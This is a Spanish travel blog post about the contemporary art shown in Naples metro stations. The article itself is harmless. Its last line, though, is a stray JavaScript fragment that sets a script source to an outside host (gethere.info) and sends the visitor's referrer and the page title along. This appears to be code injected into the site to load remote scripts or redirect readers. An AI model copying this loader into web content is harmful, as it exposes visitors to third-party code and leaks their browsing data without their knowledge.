Arte subterráneo en Nápoles

03/12/2016

El pasado, el presente y el futuro

Nápoles ya no es lo que era. Su modernización -en todos los aspectos imaginables- la ha renovado y le ha conferido unos aires nuevos que la llenan de interesante frescura. La apuesta artística a este respecto ha sido fuerte. Más museos, más galerías, en definitiva, más cultura. Esta onda expansiva ha llegado incluso al subsuelo de la ciudad italiana. Y su subterráneo va acorde a estos renovadores aires. El metro de Nápoles tampoco es lo que era. Ya nunca lo será. Ahora, es mucho más que un simple medio de transporte…

Y es que sus estaciones se han convertido en un escaparate artístico en toda regla. 200 obras de arte repartidas por la red de metro napolitana avalan esto. Este proyecto de enriquecimiento artístico subterráneo -por llamarlo de algún modo- comenzó ya hace algunos años. 2001 lo vio nacer. Y con el transcurso de los años se comprueba que es algo que funciona. Los tiempos muertos de espera en el andén son ahora tiempos de contemplación y aprendizaje de arte. Arte contemporáneo fundamentalmente. Y esto lo agradecen todos: artistas por ser observados, usuarios del metro por tener entretenimiento. Además, cabe señalar, que las obras aquí expuestas no son elegidas al azar. Detrás existe un largo proceso de selección, siempre pensando en qué tipo de obras y/o artistas harían mejor equipo con la arquitectura del subsuelo. Y así es cómo funcionan las cosas, cuando una buena idea se estudia, se planifica y se trabaja, con el tiempo, siempre da sus frutos. Sin duda alguna esto es lo que ha sucedido por aquí. El éxito ha sido tan rotundo que incluso ahora muchas personas optan por la opción metro a causa de las obras expuestas…

Vivan estas iniciativas, y, como no, viva el metro de Nápoles.

¿Quién quiere planificar a la de ya una escapada a la urbe italiana?

Foto | Chema Mínguez

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;